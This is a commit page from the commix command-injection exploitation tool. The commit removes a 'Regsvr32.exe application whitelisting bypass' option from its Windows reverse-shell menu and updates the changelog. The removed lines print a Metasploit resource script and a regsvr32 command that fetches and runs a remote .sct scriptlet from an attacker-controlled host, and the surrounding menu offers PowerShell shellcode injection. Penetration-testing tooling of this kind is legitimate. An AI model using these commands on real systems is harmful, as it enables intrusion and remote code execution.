Skip to content

Commit 05eeb88

Browse files
committed
The "Regsvr32.exe application whitelisting bypass" attack vector has been removed.
1 parent 5abb3be commit 05eeb88

File tree

3 files changed

+2
-22
lines changed

3 files changed

+2
-22
lines changed

doc/CHANGELOG.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
## Version 3.3 (TBA)
2+
* Removed: The "Regsvr32.exe application whitelisting bypass" attack vector has been removed.
23
* Updated: Minor update regarding web delivery script (i.e. Python meterpreter reverse TCP shell).
34
* Replaced: The `--backticks` switch has been replaced with "backticks.py" tamper script.
45
* Added: New tamper script "backticks.py" that uses backticks instead of "$()", for commands substitution. (for *nix targets).

src/core/shells/reverse_tcp.py

Lines changed: 0 additions & 21 deletions
Original file line numberDiff line numberDiff line change
@@ -512,7 +512,6 @@ def other_reverse_shells(separator):
512512
---[ """ + Style.BRIGHT + Fore.BLUE + """Powershell injection attacks""" + Style.RESET_ALL + """ ]---
513513
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use shellcode injection with native x86 shellcode.
514514
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use TrustedSec's Magic Unicorn.
515-
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Regsvr32.exe application whitelisting bypass.
516515
\ncommix(""" + Style.BRIGHT + Fore.RED + """windows_meterpreter_reverse_tcp""" + Style.RESET_ALL + """) > """)
517516

518517
if any(option in windows_reverse_shell.lower() for option in settings.SHELL_OPTIONS):
@@ -522,8 +521,6 @@ def other_reverse_shells(separator):
522521
output = "powershell_attack.rc"
523522
elif windows_reverse_shell == '2' :
524523
output = "powershell_attack.txt"
525-
elif windows_reverse_shell == '3' :
526-
output = "regsvr32_applocker_bypass_server.rc"
527524
else:
528525
err_msg = "The '" + windows_reverse_shell + "' option, is not valid."
529526
print(settings.print_error_msg(err_msg))
@@ -603,24 +600,6 @@ def other_reverse_shells(separator):
603600
except:
604601
print(settings.SINGLE_WHITESPACE)
605602
break
606-
607-
# Regsvr32.exe application whitelisting bypass
608-
elif windows_reverse_shell == '3':
609-
with open(output, 'w+') as filewrite:
610-
filewrite.write("use exploit/windows/misc/regsvr32_applocker_bypass_server\n"
611-
"set payload " + payload + "\n"
612-
"set lhost " + str(settings.LHOST) + "\n"
613-
"set lport " + str(settings.LPORT) + "\n"
614-
"set srvport " + str(settings.SRVPORT) + "\n"
615-
"set uripath " + settings.URIPATH + "\n"
616-
"exploit\n\n")
617-
if not settings.TARGET_OS == "win":
618-
windows_only_attack_vector()
619-
continue
620-
else:
621-
other_shell = "regsvr32 /s /n /u /i:http://" + str(settings.LHOST) + ":" + str(settings.SRVPORT) + settings.URIPATH +".sct scrobj.dll"
622-
msf_launch_msg(output)
623-
break
624603
break
625604

626605
# Web delivery script

src/utils/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -216,7 +216,7 @@ def sys_argv_errors():
216216
DESCRIPTION = "The command injection exploiter"
217217
AUTHOR = "Anastasios Stasinopoulos"
218218
VERSION_NUM = "3.3"
219-
REVISION = "48"
219+
REVISION = "49"
220220
STABLE_RELEASE = False
221221
if STABLE_RELEASE:
222222
VERSION = "v" + VERSION_NUM + "-stable"

0 commit comments

Comments
 (0)